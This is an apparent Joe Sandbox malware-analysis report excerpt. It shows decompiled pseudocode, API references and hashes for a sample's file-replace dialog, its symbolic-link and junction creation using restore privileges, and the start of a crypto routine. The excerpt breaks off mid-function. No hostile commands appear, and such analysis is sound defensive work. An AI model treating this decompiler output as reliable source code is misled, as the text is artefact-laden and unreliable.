                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: CurrentDirectory
                                                        • String ID:
                                                        • API String ID: 1611563598-0
                                                        • Opcode ID: 296fcf20f9a0f02a345ab7693a16727f0fbdd7bc27f510b06d1457c934804ac5
                                                        • Instruction ID: 457fe42abedc1826c9b0e7db48abce9c018f49138294111c1656f534ea56a2c5
                                                        • Opcode Fuzzy Hash: 296fcf20f9a0f02a345ab7693a16727f0fbdd7bc27f510b06d1457c934804ac5
                                                        • Instruction Fuzzy Hash: 2AA01231198006568E004B30CC09C1576505760703F0087207002C00A0CB308814A500
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Function 00A1BB70 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286timewindowfileCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 71%
                                                        			E00A1BB70(void* __ecx, void* __edx, void* __eflags, char _a4, short _a8, char _a12, short _a108, short _a112, char _a192, char _a212, struct _WIN32_FIND_DATAW _a288, signed char _a304, signed char _a308, struct _FILETIME _a332, intOrPtr _a340, intOrPtr _a344, short _a884, short _a896, short _a900, int _a1904, char _a1924, int _a1928, short _a2596, short _a2616, char _a2628, char _a2640, struct HWND__* _a6740, intOrPtr _a6744, signed short _a6748, intOrPtr _a6752) {
				struct _FILETIME _v0;
				struct _SYSTEMTIME _v12;
				struct _SYSTEMTIME _v16;
				struct _FILETIME _v24;
				void* _t73;
				void* _t136;
				long _t137;
				void* _t141;
				void* _t142;
				void* _t143;
				void* _t144;
				void* _t145;
				signed short _t148;
				void* _t149;
				void* _t151;
				void* _t152;
				intOrPtr _t153;
				signed int _t154;
				signed int _t158;
				struct HWND__* _t160;
				intOrPtr _t163;
				void* _t164;
				int _t167;
				int _t170;
				void* _t175;
				void* _t177;

				_t157 = __edx;
				_t152 = __ecx;
				E00A1E630();
				_t148 = _a6748;
				_t163 = _a6744;
				_t160 = _a6740;
				if(E00A0130B(__edx, _t160, _t163, _t148, _a6752, L"REPLACEFILEDLG", 0, 0) == 0) {
					_t164 = _t163 - 0x110;
					if(_t164 == 0) {
						SetFocus(GetDlgItem(_t160, 0x6c));
						E00A10131( &_a2640, _a6752, 0x800);
						E00A0BF5F( &_a2628,  &_a2628, 0x800);
						SetDlgItemTextW(_t160, 0x65,  &_a2616);
						 *0xa62080( &_a2616, 0,  &_a1924, 0x2b4, 0x100);
						SendDlgItemMessageW(_t160, 0x66, 0x170, _a1904, 0);
						_t149 = FindFirstFileW( &_a2596,  &_a288);
						if(_t149 != 0xffffffff) {
							FileTimeToLocalFileTime( &_a332,  &(_v24.dwHighDateTime));
							FileTimeToSystemTime( &(_v24.dwHighDateTime),  &_v12);
							_push(0x32);
							_push( &_a12);
							_push(0);
							_push( &_v12);
							_t167 = 2;
							GetTimeFormatW(0x400, 0x800, ??, ??, ??, ??);
							GetDateFormatW(0x400, 0,  &_v12, 0,  &_a112, 0x32);
							_push( &_a12);
							_push( &_a112);
							E00A03F8F( &_a900, 0x200, L"%s %s %s", E00A0E0AC(_t152, 0x99));
							_t177 = _t175 + 0x18;
							SetDlgItemTextW(_t160, 0x6a,  &_a900);
							FindClose(_t149);
							if((_a308 & 0x00000010) != 0) {
								_t151 = 0x200;
							} else {
								asm("adc eax, ebp");
								E00A1A8CC(0 + _a344, _a340,  &_a212, 0x32);
								_push(E00A0E0AC(0 + _a344, 0x98));
								_t151 = 0x200;
								E00A03F8F( &_a884, 0x200, L"%s %s",  &_a192);
								_t177 = _t177 + 0x14;
								SetDlgItemTextW(_t160, 0x68,  &_a884);
							}
							SendDlgItemMessageW(_t160, 0x67, 0x170, _a1928, 0);
							_t153 =  *0xa48464; // 0x0
							E00A10EAD(_t153, _t157,  &_a4);
							FileTimeToLocalFileTime( &_v0,  &_v24);
							FileTimeToSystemTime( &_v24,  &_v16);
							GetTimeFormatW(0x400, _t167,  &_v16, 0,  &_a8, 0x32);
							GetDateFormatW(0x400, 0,  &_v16, 0,  &_a108, 0x32);
							_push( &_a8);
							_push( &_a108);
							E00A03F8F( &_a896, _t151, L"%s %s %s", E00A0E0AC(_t153, 0x99));
							_t175 = _t177 + 0x18;
							SetDlgItemTextW(_t160, 0x6b,  &_a896);
							_t154 =  *0xa5dc8c;
							_t158 =  *0xa5dc88;
							if((_a304 & 0x00000010) == 0 || (_t158 | _t154) != 0) {
								E00A1A8CC(_t158, _t154,  &_a212, 0x32);
								_push(E00A0E0AC(_t154, 0x98));
								E00A03F8F( &_a884, _t151, L"%s %s",  &_a192);
								_t175 = _t175 + 0x14;
								SetDlgItemTextW(_t160, 0x69,  &_a884);
							}
						}
						L27:
						_t73 = 0;
						L28:
						return _t73;
					}
					if(_t164 != 1) {
						goto L27;
					}
					_t170 = 2;
					_t136 = (_t148 & 0x0000ffff) - _t170;
					if(_t136 == 0) {
						L11:
						_push(6);
						L12:
						_pop(_t170);
						L13:
						_t137 = SendDlgItemMessageW(_t160, 0x66, 0x171, 0, 0);
						if(_t137 != 0) {
							 *0xa620d8(_t137);
						}
						EndDialog(_t160, _t170);
						goto L1;
					}
					_t141 = _t136 - 0x6a;
					if(_t141 == 0) {
						_t170 = 0;
						goto L13;
					}
					_t142 = _t141 - 1;
					if(_t142 == 0) {
						_t170 = 1;
						goto L13;
					}
					_t143 = _t142 - 1;
					if(_t143 == 0) {
						_push(4);
						goto L12;
					}
					_t144 = _t143 - 1;
					if(_t144 == 0) {
						goto L13;
					}
					_t145 = _t144 - 1;
					if(_t145 == 0) {
						_push(3);
						goto L12;
					}
					if(_t145 != 1) {
						goto L27;
					}
					goto L11;
				}
				L1:
				_t73 = 1;
				goto L28;
			}





























                                                        0x00a1bb70
                                                        0x00a1bb70
                                                        0x00a1bb75
                                                        0x00a1bb7b
                                                        0x00a1bb84
                                                        0x00a1bb8e
                                                        0x00a1bbad
                                                        0x00a1bbb7
                                                        0x00a1bbbd
                                                        0x00a1bc37
                                                        0x00a1bc52
                                                        0x00a1bc61
                                                        0x00a1bc71
                                                        0x00a1bc92
                                                        0x00a1bca8
                                                        0x00a1bcc4
                                                        0x00a1bcc9
                                                        0x00a1bcdc
                                                        0x00a1bcec
                                                        0x00a1bcf2
                                                        0x00a1bcf8
                                                        0x00a1bcf9
                                                        0x00a1bcfe
                                                        0x00a1bd01
                                                        0x00a1bd08
                                                        0x00a1bd24
                                                        0x00a1bd2e
                                                        0x00a1bd36
                                                        0x00a1bd54
                                                        0x00a1bd59
                                                        0x00a1bd67
                                                        0x00a1bd6e
                                                        0x00a1bd7c
                                                        0x00a1bde2
                                                        0x00a1bd7e
                                                        0x00a1bd98
                                                        0x00a1bd9c
                                                        0x00a1bdab
                                                        0x00a1bdb3
                                                        0x00a1bdc7
                                                        0x00a1bdcc
                                                        0x00a1bdda
                                                        0x00a1bdda
                                                        0x00a1bdf7
                                                        0x00a1bdfd
                                                        0x00a1be08
                                                        0x00a1be17
                                                        0x00a1be27
                                                        0x00a1be41
                                                        0x00a1be59
                                                        0x00a1be63
                                                        0x00a1be6b
                                                        0x00a1be85
                                                        0x00a1be8a
                                                        0x00a1be98
                                                        0x00a1bea6
                                                        0x00a1beac
                                                        0x00a1beb2
                                                        0x00a1bec6
                                                        0x00a1bed5
                                                        0x00a1beec
                                                        0x00a1bef1
                                                        0x00a1beff
                                                        0x00a1beff
                                                        0x00a1beb2
                                                        0x00a1bf05
                                                        0x00a1bf05
                                                        0x00a1bf07
                                                        0x00a1bf11
                                                        0x00a1bf11
                                                        0x00a1bbc2
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1bbcd
                                                        0x00a1bbce
                                                        0x00a1bbd0
                                                        0x00a1bbf4
                                                        0x00a1bbf4
                                                        0x00a1bbf6
                                                        0x00a1bbf6
                                                        0x00a1bbf7
                                                        0x00a1bc01
                                                        0x00a1bc09
                                                        0x00a1bc0c
                                                        0x00a1bc0c
                                                        0x00a1bc14
                                                        0x00000000
                                                        0x00a1bc14
                                                        0x00a1bbd2
                                                        0x00a1bbd5
                                                        0x00a1bc29
                                                        0x00000000
                                                        0x00a1bc29
                                                        0x00a1bbd7
                                                        0x00a1bbda
                                                        0x00a1bc26
                                                        0x00000000
                                                        0x00a1bc26
                                                        0x00a1bbdc
                                                        0x00a1bbdf
                                                        0x00a1bc20
                                                        0x00000000
                                                        0x00a1bc20
                                                        0x00a1bbe1
                                                        0x00a1bbe4
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1bbe6
                                                        0x00a1bbe9
                                                        0x00a1bc1c
                                                        0x00000000
                                                        0x00a1bc1c
                                                        0x00a1bbee
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1bbee
                                                        0x00a1bbaf
                                                        0x00a1bbb1
                                                        0x00000000

                                                        APIs
                                                          • Part of subcall function 00A0130B: GetDlgItem.USER32(00000000,00003021), ref: 00A0134F
                                                          • Part of subcall function 00A0130B: SetWindowTextW.USER32(00000000,00A335B4), ref: 00A01365
                                                        • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00A1BC01
                                                        • EndDialog.USER32(?,00000006), ref: 00A1BC14
                                                        • GetDlgItem.USER32(?,0000006C), ref: 00A1BC30
                                                        • SetFocus.USER32(00000000), ref: 00A1BC37
                                                        • SetDlgItemTextW.USER32(?,00000065,?), ref: 00A1BC71
                                                        • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00A1BCA8
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00A1BCBE
                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00A1BCDC
                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00A1BCEC
                                                        • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00A1BD08
                                                        • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00A1BD24
                                                        • _swprintf.LIBCMT ref: 00A1BD54
                                                          • Part of subcall function 00A03F8F: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00A03FA2
                                                        • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00A1BD67
                                                        • FindClose.KERNEL32(00000000), ref: 00A1BD6E
                                                        • _swprintf.LIBCMT ref: 00A1BDC7
                                                        • SetDlgItemTextW.USER32(?,00000068,?), ref: 00A1BDDA
                                                        • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00A1BDF7
                                                        • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00A1BE17
                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00A1BE27
                                                        • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00A1BE41
                                                        • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00A1BE59
                                                        • _swprintf.LIBCMT ref: 00A1BE85
                                                        • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00A1BE98
                                                        • _swprintf.LIBCMT ref: 00A1BEEC
                                                        • SetDlgItemTextW.USER32(?,00000069,?), ref: 00A1BEFF
                                                          • Part of subcall function 00A1A8CC: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00A1A8F2
                                                          • Part of subcall function 00A1A8CC: GetNumberFormatW.KERNEL32 ref: 00A1A941
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                        • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                        • API String ID: 797121971-1840816070
                                                        • Opcode ID: dda6b8649e221f283ae3576ef2b98f2d97729692461d024169f24914c70a5096
                                                        • Instruction ID: 08d1888dcb85bf9c43949108fdf280b18c8be047a8c061248c6f1c38f2116097
                                                        • Opcode Fuzzy Hash: dda6b8649e221f283ae3576ef2b98f2d97729692461d024169f24914c70a5096
                                                        • Instruction Fuzzy Hash: DC91B3B2248348BFD621DBA0DD49FFB77ACEB89704F040819F645D6081D7B5AA458B72
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A071E6 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 326fileCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 87%
                                                        			E00A071E6(void* __edx) {
				void* __esi;
				signed int _t109;
				void* _t111;
				void* _t112;
				intOrPtr _t115;
				intOrPtr _t121;
				signed int _t139;
				long _t158;
				void* _t184;
				void* _t188;
				void* _t192;
				void* _t197;
				short _t198;
				void* _t202;
				intOrPtr _t203;
				void* _t206;
				void* _t207;
				void* _t229;
				void* _t230;
				void* _t232;
				intOrPtr _t233;
				intOrPtr _t234;
				WCHAR* _t237;
				intOrPtr _t240;
				short _t241;
				void* _t242;
				intOrPtr _t246;
				short _t248;
				void* _t249;
				void* _t251;
				void* _t252;

				_t232 = __edx;
				E00A1E554(E00A3209F, _t249);
				E00A1E630();
				if( *0xa40eb3 == 0) {
					E00A07CC4(L"SeRestorePrivilege");
					E00A07CC4(L"SeCreateSymbolicLinkPrivilege");
					 *0xa40eb3 = 1;
				}
				_t205 = _t249 - 0x2c;
				E00A01380(_t249 - 0x2c, 0x1418);
				_t240 =  *((intOrPtr*)(_t249 + 0x10));
				_t202 = 0;
				 *((intOrPtr*)(_t249 - 4)) = 0;
				E00A10131(_t249 - 0x107c, _t240 + 0x1104, 0x800);
				 *((intOrPtr*)(_t249 - 0x18)) = E00A23883(_t249 - 0x107c);
				_t236 = _t249 - 0x107c;
				_t109 = E00A25AF8(_t249 - 0x107c, L"\\??\\", 4);
				_t252 = _t251 + 0x10;
				asm("sbb al, al");
				_t111 =  ~_t109 + 1;
				 *(_t249 - 0x10) = _t111;
				if(_t111 == 0) {
					L5:
					_t112 = _t249 - 0x207c;
					L6:
					E00A25AD6(_t112, _t236);
					_t115 = E00A23883(_t249 - 0x207c);
					_t237 =  *(_t249 + 0xc);
					 *((intOrPtr*)(_t249 - 0x14)) = _t115;
					_t116 =  *((intOrPtr*)(_t249 + 8));
					if( *((intOrPtr*)( *((intOrPtr*)(_t249 + 8)) + 0x6197)) != _t202) {
						L11:
						E00A0A1EF(_t205, _t249, _t237, 1,  *(_t116 + 0x6147) & 0x000000ff);
						if(E00A0A373(_t237) != 0) {
							_t188 = E00A0A3D5(E00A0A387(_t237));
							_push(_t237);
							if(_t188 == 0) {
								E00A0A320();
							} else {
								E00A0A2CD();
							}
						}
						if( *((intOrPtr*)(_t240 + 0x10f1)) != _t202 ||  *((intOrPtr*)(_t240 + 0x2104)) != _t202) {
							__eflags = CreateDirectoryW(_t237, _t202);
							if(__eflags != 0) {
								goto L20;
							}
							E00A06D72(__eflags, 0x14, _t202, _t237);
							_t229 = 0xa40f50;
							goto L29;
						} else {
							_t184 = CreateFileW(_t237, 0x40000000, _t202, _t202, 1, 0x80, _t202);
							if(_t184 != 0xffffffff) {
								CloseHandle(_t184);
								L20:
								_t121 =  *((intOrPtr*)(_t240 + 0x1100));
								__eflags = _t121 - 3;
								if(_t121 != 3) {
									__eflags = _t121 - 2;
									if(_t121 == 2) {
										L26:
										_t206 =  *(_t249 - 0x2c);
										_t233 =  *((intOrPtr*)(_t249 - 0x18));
										 *_t206 = 0xa000000c;
										_t241 = _t233 + _t233;
										 *((short*)(_t206 + 0xa)) = _t241;
										 *((short*)(_t206 + 4)) = 0x10 + ( *((intOrPtr*)(_t249 - 0x14)) + _t233) * 2;
										 *((intOrPtr*)(_t206 + 6)) = 0;
										E00A25AD6(_t206 + 0x14, _t249 - 0x107c);
										_t242 =  *(_t249 - 0x2c);
										 *((short*)(_t242 + 0xc)) = _t241 + 2;
										 *((short*)(_t242 + 0xe)) =  *((intOrPtr*)(_t249 - 0x14)) +  *((intOrPtr*)(_t249 - 0x14));
										E00A25AD6(_t242 + ( *((intOrPtr*)(_t249 - 0x18)) + 0xb) * 2, _t249 - 0x207c);
										_t139 =  *(_t249 - 0x10) & 0x000000ff ^ 0x00000001;
										__eflags = _t139;
										 *(_t242 + 0x10) = _t139;
										L27:
										_t207 = CreateFileW(_t237, 0xc0000000, _t202, _t202, 3, 0x2200000, _t202);
										 *(_t249 - 0x10) = _t207;
										__eflags = _t207 - 0xffffffff;
										if(_t207 != 0xffffffff) {
											__eflags = DeviceIoControl(_t207, 0x900a4, _t242, ( *(_t242 + 4) & 0x0000ffff) + 8, _t202, _t202, _t249 - 0x30, _t202);
											if(__eflags != 0) {
												E00A097B6(_t249 - 0x30a4);
												 *((char*)(_t249 - 4)) = 1;
												E00A07CA3(_t249 - 0x30a4,  *(_t249 - 0x10));
												_t203 =  *((intOrPtr*)(_t249 + 8));
												_t243 =  *((intOrPtr*)(_t249 + 0x10));
												asm("sbb ecx, ecx");
												asm("sbb ecx, ecx");
												asm("sbb ecx, ecx");
												E00A09F02(_t249 - 0x30a4,  *((intOrPtr*)(_t249 + 0x10)),  ~( *(_t203 + 0x72d0)) &  *((intOrPtr*)(_t249 + 0x10)) + 0x00001040,  ~( *(_t203 + 0x72d4)) & _t243 + 0x00001048,  ~( *(_t203 + 0x72d8)) & _t243 + 0x00001050);
												E00A09870(_t249 - 0x30a4);
												__eflags =  *((char*)(_t203 + 0x61a8));
												if( *((char*)(_t203 + 0x61a8)) == 0) {
													E00A0A637(_t237,  *((intOrPtr*)(_t243 + 0x24)));
												}
												_t202 = 1;
												E00A097F0(_t249 - 0x30a4, _t243);
												L41:
												E00A015C2(_t249 - 0x2c);
												 *[fs:0x0] =  *((intOrPtr*)(_t249 - 0xc));
												return _t202;
											}
											CloseHandle( *(_t249 - 0x10));
											E00A06D72(__eflags, 0x15, _t202, _t237);
											_t158 = GetLastError();
											__eflags = _t158 - 5;
											if(_t158 == 5) {
												L33:
												__eflags = E00A102FB();
												if(__eflags == 0) {
													E00A0158D(_t249 - 0x7c, 0x18);
													E00A11107(_t249 - 0x7c);
												}
												L35:
												E00A07002(__eflags);
												E00A06FBA(0xa40f50, 9);
												_t246 =  *((intOrPtr*)(_t249 + 0x10));
												_push(_t237);
												__eflags =  *((intOrPtr*)(_t246 + 0x10f1)) - _t202;
												if( *((intOrPtr*)(_t246 + 0x10f1)) == _t202) {
													DeleteFileW();
												} else {
													RemoveDirectoryW();
												}
												goto L41;
											}
											__eflags = _t158 - 0x522;
											if(__eflags != 0) {
												goto L35;
											}
											goto L33;
										}
										E00A06E55(_t237);
										_t229 = 0xa40f50;
										L29:
										E00A06FBA(_t229, 9);
										goto L41;
									}
									__eflags = _t121 - 1;
									if(_t121 != 1) {
										goto L41;
									}
									goto L26;
								}
								_t230 =  *(_t249 - 0x2c);
								_t234 =  *((intOrPtr*)(_t249 - 0x18));
								 *_t230 = 0xa0000003;
								_t248 = _t234 + _t234;
								 *((short*)(_t230 + 0xa)) = _t248;
								 *((short*)(_t230 + 4)) = 0xc + ( *((intOrPtr*)(_t249 - 0x14)) + _t234) * 2;
								 *((intOrPtr*)(_t230 + 6)) = 0;
								E00A25AD6(_t230 + 0x10, _t249 - 0x107c);
								_t242 =  *(_t249 - 0x2c);
								 *((short*)(_t242 + 0xc)) = _t248 + 2;
								 *((short*)(_t242 + 0xe)) =  *((intOrPtr*)(_t249 - 0x14)) +  *((intOrPtr*)(_t249 - 0x14));
								E00A25AD6(_t242 + ( *((intOrPtr*)(_t249 - 0x18)) + 9) * 2, _t249 - 0x207c);
								goto L27;
							}
							E00A06E55(_t237);
							goto L41;
						}
					}
					if( *(_t249 - 0x10) != _t202) {
						goto L41;
					}
					_t192 = E00A0BA22(_t240 + 0x1104);
					_t262 = _t192;
					if(_t192 != 0) {
						goto L41;
					}
					_push(_t240 + 0x1104);
					_push(_t237);
					_push(_t240 + 0x28);
					_push( *((intOrPtr*)(_t249 + 8)));
					if(E00A07A81(_t232, _t262) == 0) {
						goto L41;
					}
					_t116 =  *((intOrPtr*)(_t249 + 8));
					goto L11;
				}
				_t236 = _t249 - 0x1074;
				_t197 = E00A25AF8(_t249 - 0x1074, L"UNC\\", 4);
				_t252 = _t252 + 0xc;
				if(_t197 != 0) {
					goto L5;
				} else {
					_t198 = 0x5c;
					 *((short*)(_t249 - 0x207c)) = _t198;
					_t236 = _t249 - 0x106e;
					_t112 = _t249 - 0x207a;
					goto L6;
				}
			}


































                                                        0x00a071e6
                                                        0x00a071eb
                                                        0x00a071f5
                                                        0x00a07201
                                                        0x00a07208
                                                        0x00a07212
                                                        0x00a07217
                                                        0x00a07217
                                                        0x00a07226
                                                        0x00a07229
                                                        0x00a0722e
                                                        0x00a07231
                                                        0x00a07238
                                                        0x00a07249
                                                        0x00a0725c
                                                        0x00a0725f
                                                        0x00a0726d
                                                        0x00a07272
                                                        0x00a07277
                                                        0x00a07279
                                                        0x00a0727b
                                                        0x00a07280
                                                        0x00a072b6
                                                        0x00a072b6
                                                        0x00a072bc
                                                        0x00a072be
                                                        0x00a072ca
                                                        0x00a072cf
                                                        0x00a072d5
                                                        0x00a072d8
                                                        0x00a072e1
                                                        0x00a0731f
                                                        0x00a0732a
                                                        0x00a07337
                                                        0x00a07340
                                                        0x00a07345
                                                        0x00a07348
                                                        0x00a07351
                                                        0x00a0734a
                                                        0x00a0734a
                                                        0x00a0734a
                                                        0x00a07348
                                                        0x00a0735c
                                                        0x00a07420
                                                        0x00a07422
                                                        0x00000000
                                                        0x00000000
                                                        0x00a0742c
                                                        0x00a07431
                                                        0x00000000
                                                        0x00a0736e
                                                        0x00a0737e
                                                        0x00a07387
                                                        0x00a0739a
                                                        0x00a073a0
                                                        0x00a073a0
                                                        0x00a073a6
                                                        0x00a073a9
                                                        0x00a0743b
                                                        0x00a0743e
                                                        0x00a07449
                                                        0x00a07449
                                                        0x00a0744c
                                                        0x00a07454
                                                        0x00a0745a
                                                        0x00a0745d
                                                        0x00a07468
                                                        0x00a0746e
                                                        0x00a0747c
                                                        0x00a07484
                                                        0x00a07487
                                                        0x00a07490
                                                        0x00a074a5
                                                        0x00a074b3
                                                        0x00a074b3
                                                        0x00a074b6
                                                        0x00a074b9
                                                        0x00a074cf
                                                        0x00a074d1
                                                        0x00a074d4
                                                        0x00a074d7
                                                        0x00a07510
                                                        0x00a07512
                                                        0x00a07590
                                                        0x00a0759e
                                                        0x00a075a2
                                                        0x00a075a7
                                                        0x00a075aa
                                                        0x00a075bb
                                                        0x00a075ce
                                                        0x00a075e1
                                                        0x00a075ec
                                                        0x00a075f7
                                                        0x00a075fc
                                                        0x00a07603
                                                        0x00a07609
                                                        0x00a07609
                                                        0x00a07614
                                                        0x00a07616
                                                        0x00a0761b
                                                        0x00a0761e
                                                        0x00a0762b
                                                        0x00a07635
                                                        0x00a07635
                                                        0x00a07517
                                                        0x00a07521
                                                        0x00a07526
                                                        0x00a0752c
                                                        0x00a0752f
                                                        0x00a07538
                                                        0x00a0753d
                                                        0x00a0753f
                                                        0x00a07546
                                                        0x00a0754e
                                                        0x00a0754e
                                                        0x00a07553
                                                        0x00a0755a
                                                        0x00a07563
                                                        0x00a07568
                                                        0x00a0756b
                                                        0x00a0756c
                                                        0x00a07572
                                                        0x00a0757f
                                                        0x00a07574
                                                        0x00a07574
                                                        0x00a07574
                                                        0x00000000
                                                        0x00a07572
                                                        0x00a07531
                                                        0x00a07536
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a07536
                                                        0x00a074e1
                                                        0x00a074e6
                                                        0x00a074e8
                                                        0x00a074ea
                                                        0x00000000
                                                        0x00a074ea
                                                        0x00a07440
                                                        0x00a07443
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a07443
                                                        0x00a073af
                                                        0x00a073b2
                                                        0x00a073ba
                                                        0x00a073c0
                                                        0x00a073c3
                                                        0x00a073ce
                                                        0x00a073d4
                                                        0x00a073e2
                                                        0x00a073ea
                                                        0x00a073ed
                                                        0x00a073f6
                                                        0x00a0740b
                                                        0x00000000
                                                        0x00a07410
                                                        0x00a0738f
                                                        0x00000000
                                                        0x00a0738f
                                                        0x00a0735c
                                                        0x00a072e6
                                                        0x00000000
                                                        0x00000000
                                                        0x00a072f3
                                                        0x00a072f8
                                                        0x00a072fa
                                                        0x00000000
                                                        0x00000000
                                                        0x00a07306
                                                        0x00a07307
                                                        0x00a0730b
                                                        0x00a0730c
                                                        0x00a07316
                                                        0x00000000
                                                        0x00000000
                                                        0x00a0731c
                                                        0x00000000
                                                        0x00a0731c
                                                        0x00a07284
                                                        0x00a07292
                                                        0x00a07297
                                                        0x00a0729c
                                                        0x00000000
                                                        0x00a0729e
                                                        0x00a072a0
                                                        0x00a072a1
                                                        0x00a072a8
                                                        0x00a072ae
                                                        0x00000000
                                                        0x00a072ae

                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 00A071EB
                                                          • Part of subcall function 00A07CC4: GetCurrentProcess.KERNEL32(00000020,?), ref: 00A07CD3
                                                          • Part of subcall function 00A07CC4: GetLastError.KERNEL32 ref: 00A07D19
                                                          • Part of subcall function 00A07CC4: CloseHandle.KERNEL32(?), ref: 00A07D28
                                                          • Part of subcall function 00A0A320: DeleteFileW.KERNELBASE(?,?,?,00A099EC,?,?,00A09825,?,?,?,?,00A31F81,000000FF), ref: 00A0A331
                                                          • Part of subcall function 00A0A320: DeleteFileW.KERNEL32(?,?,?,00000800,?,?,00A099EC,?,?,00A09825,?,?,?,?,00A31F81,000000FF), ref: 00A0A35F
                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00A0737E
                                                        • CloseHandle.KERNEL32(00000000), ref: 00A0739A
                                                        • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00A074C9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: File$CloseCreateDeleteHandle$CurrentErrorH_prologLastProcess
                                                        • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                        • API String ID: 2517273693-3508440684
                                                        • Opcode ID: 8099076ccfdb57fd91383eab52a46ec3fc8fb5867132e094a060dd0a212a45bd
                                                        • Instruction ID: c866587e10aab0919f728a50212e6887d04905871e849e149503b4ebb203abe5
                                                        • Opcode Fuzzy Hash: 8099076ccfdb57fd91383eab52a46ec3fc8fb5867132e094a060dd0a212a45bd
                                                        • Instruction Fuzzy Hash: 27C1F475D0420CAADF20DBB4ED86EEEB7B8AF04304F004569F55AE7282D771BA45CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A03206 Relevance: 12.9, APIs: 4, Strings: 3, Instructions: 608COMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 82%
                                                        			E00A03206(intOrPtr* __ecx, void* __eflags) {
				void* __ebp;
				signed int _t242;
				void* _t248;
				unsigned int _t250;
				signed int _t254;
				signed int _t255;
				unsigned int _t256;
				void* _t257;
				char _t270;
				signed int _t289;
				unsigned int _t290;
				intOrPtr _t291;
				signed int _t292;
				signed int _t295;
				char _t302;
				signed char _t304;
				signed int _t320;
				signed int _t331;
				signed int _t335;
				signed int _t350;
				signed char _t352;
				unsigned int _t362;
				void* _t379;
				void* _t381;
				void* _t382;
				void* _t393;
				intOrPtr* _t395;
				intOrPtr* _t397;
				signed int _t410;
				signed int _t420;
				char _t432;
				signed int _t433;
				signed int _t438;
				signed int _t442;
				intOrPtr _t450;
				unsigned int _t456;
				unsigned int _t459;
				signed int _t463;
				signed int _t471;
				signed int _t480;
				signed int _t485;
				signed int _t500;
				intOrPtr _t501;
				signed int _t502;
				signed char _t503;
				unsigned int _t504;
				void* _t511;
				void* _t519;
				signed int _t522;
				void* _t523;
				signed int _t533;
				unsigned int _t536;
